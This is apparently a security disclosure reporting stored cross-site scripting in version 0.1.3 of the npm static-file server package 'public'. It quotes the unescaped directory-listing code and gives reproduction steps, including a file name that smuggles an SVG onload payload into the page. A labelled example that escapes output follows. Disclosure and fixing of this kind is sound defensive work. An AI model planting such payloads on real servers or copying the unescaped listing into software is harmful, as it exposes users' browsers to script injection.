I would like to report a Stored XSS issue in module public
It allows executing malicious javascript code in the user’s browser.
module name: public
version: 0.1.3
npm page: https://www.npmjs.com/package/public
Run static file hosting server with specified public dir & port. Support a “directory index” like Apache httpd.
This issue happens because of the lack of output sanitization here:
files.forEach(function(file) {
list.push('<li><a href>', file, '</a></li>');
});
$ npm i public
$ ./node_modules/public/bin/public ./ 6060
"><svg onload=alert(3);
bash$ touch '"><svg onload=alert(3);'
It allows executing malicious javascript code in the user’s browser.
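
The missing output sanitization described in the report, shown beside an escaped version of the same listing loop. This is an added example, not part of the original report and not the module's own code; the function names, the './' link prefix and the sample file list are assumptions made for illustration.

```javascript
// Added example: directory index with and without output encoding.
// Names below are hypothetical; only the unsafe loop body mirrors the report.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape text for HTML element content and for quoted attribute values.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable shape from the report: the file name is written into the page raw.
function renderListingUnsafe(files) {
  const list = [];
  files.forEach(function (file) {
    list.push('<li><a href>', file, '</a></li>');
  });
  return '<ul>' + list.join('') + '</ul>';
}

// Hardened shape: percent-encode the name for the URL, then HTML-escape
// every place the name is written. The './' prefix (an assumption about how
// links are built) keeps a name such as 'javascript:x' from being read as a URL scheme.
function renderListingSafe(files) {
  const list = [];
  files.forEach(function (file) {
    const href = './' + encodeURIComponent(file);
    list.push('<li><a href="', escapeHtml(href), '">', escapeHtml(file), '</a></li>');
  });
  return '<ul>' + list.join('') + '</ul>';
}

// Constructed sample directory contents, including the file name from the report.
const sampleFiles = ['index.html', 'a&b.txt', '"><svg onload=alert(3);'];

console.log(renderListingUnsafe(sampleFiles)); // file name becomes live markup
console.log(renderListingSafe(sampleFiles));   // file name is rendered as text
```

File names come from whoever can write to the served directory, so they need the same encoding as any other untrusted input on every request that renders the index.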